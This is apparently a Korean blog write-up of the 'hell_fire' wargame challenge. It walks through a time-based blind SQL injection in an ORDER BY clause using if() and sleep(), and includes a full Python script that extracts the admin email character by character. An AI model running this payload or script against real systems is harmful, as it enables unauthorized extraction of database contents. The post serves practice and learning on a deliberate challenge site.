728x90
반응형
728x90
반응형
728x90
반응형

 

문제 소스:

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
 
<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|proc|union/i'$_GET[order])) exit("No Hack ~_~");
  $query = "select id,email,score from prob_hell_fire where 1 order by {$_GET[order]}";
  echo "<table border=1><tr><th>id</th><th>email</th><th>score</th>";
  $rows = mysqli_query($db,$query);
  while(($result = mysqli_fetch_array($rows))){
    if($result['id'== "admin"$result['email'= "**************";
    echo "<tr><td>{$result[id]}</td><td>{$result[email]}</td><td>{$result[score]}</td></tr>";
  }
  echo "</table><hr>query : <strong>{$query}</strong><hr>";
 
  $_GET[email] = addslashes($_GET[email]);
  $query = "select email from prob_hell_fire where id='admin' and email='{$_GET[email]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['email']) && ($result['email'=== $_GET['email'])) solve("hell_fire");
  highlight_file(__FILE__);
?>
cs

 

코드와 함께 테이블이 주어진다.

 

 

 

order by 뒤에 if문을 사용할 수 있다.

 

order by if(id='admin' and length(email)>0,id,score) 로 하면 id='admin' and length(email)>0 이 참일때 id를 반환하여 order by id가 되어 admin이 맨 처음 표시되고, 거짓일때 score을 반환하여 order by score이 되어 score이 100인 rubiya가 맨 처음 표시되어야 한다. 이를 이용해서 email의 길이와 각 자리글자씩 구해내면 된다.

 

 

위 방법을 이용하면 되야 하는데,,, 참 거짓 구분이 안된다.. 무조건 rubiya가 최상단에 뜬다.

 

 

그래서 sleep함수를 이용해서 참일 때 1초 지연시키도록 해보았다.

if(id='admin' and length(email)>0,sleep(1),id)

 

 

개발자도구의 Network를 이용하면 확인해 볼 수 있다.

 

 

https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order=if(id=%27admin%27%20and%20length(email)=28,sleep(1),id)

email의 길이는 28이다.

 

 

Time Based Blind SQL injection

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import urllib
import urllib2
import sys
import time
 
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$^&*()-_+="
 
 
key = ""
 
for i in range(28):
    for j in range(len(string)):
        payload = "if(id='admin' and substr(email,"+str(i+1)+",1)='"+string[j]+"',sleep(1),id)"
        payload = urllib.quote(payload)
        url = "https://los.rubiya.kr/chall/hell_fire_309d5f471fbdd4722d221835380bb805.php?order="+payload
 
        print url
 
        opener = urllib2.build_opener(urllib2.HTTPHandler)
        request = urllib2.Request(url)
        request.add_header('User-Agent''Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
        request.add_header('Cookie''PHPSESSID=cookie')
        request.get_method = lambda:'GET'
 
        start = time.time()
 
        data = opener.open(request)
        data = data.read()
 
        end= time.time()-start
 
 
        if end > 1:
            key += string[j]
            print "[*] Find Password!! Password is ["+key+"] "
            break
        else:
            print "[-] Fail!"
 
cs
728x90
반응형

+ Recent posts